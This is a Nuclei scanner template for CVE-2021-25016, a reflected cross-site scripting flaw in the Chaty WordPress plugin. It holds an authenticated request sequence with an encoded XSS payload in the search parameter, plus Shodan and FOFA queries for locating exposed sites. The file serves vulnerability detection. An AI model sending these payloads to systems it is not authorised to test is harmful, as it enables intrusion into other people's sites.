nuclei-templates/http/cves/2021/CVE-2021-25016.yaml
id: CVE-2021-25016

info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43227
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/chaty/
    fofa-query: body=/wp-content/plugins/chaty/
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c82f86dcd3e8b4a15e3ddea6f2679ac006399a334f94d29004e7c499a456647c02207d7a1d690acd371e2575c5a5890894ee0a0e3ca1c7507d8e83c613349a67ec41:922c64590222798bb761d5b6d8e72950